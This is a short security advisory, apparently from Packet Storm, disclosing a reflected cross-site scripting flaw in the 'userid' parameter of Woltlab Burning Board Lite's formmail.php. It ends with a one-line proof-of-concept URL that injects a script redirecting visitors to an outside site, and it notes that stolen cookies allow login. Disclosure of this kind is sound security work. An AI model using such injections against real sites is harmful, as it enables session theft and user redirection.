Type packetstorm
Reporter Martin Heistermann
Modified 2005-01-11T00:00:00


Advisory Information  
Advisory name : Woltlab Burning Board Lite formmail.php XSS  
Discovered by : drhankey / it-security23.net  
Vendor Name : Woltlab  
Vendor Homepage : http://www.woltlab.de  
Software : Woltlab Burning Board Lite  
Vulnerability Type : Cross-Site-Scripting  
Vulnerable Versions : 1.0.0, 1.0.1e, maybe more  
Platforms : OS Independent, PHP  
What is Woltlab Burning Board Lite?  
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,  
a PHP based bulletin board  
Vulnerability Description:  
formmail.php outputs the "userid"-parameter unfiltered, so its possible to add arbitary Code to the output by using a malformed link.  
The Board also allows logging in with stolen cookies.  
Proof of Concept:  
http://website/board/formmail.php?userid=1"><script>document.location.href="http://www.it-security23.net";</script x="y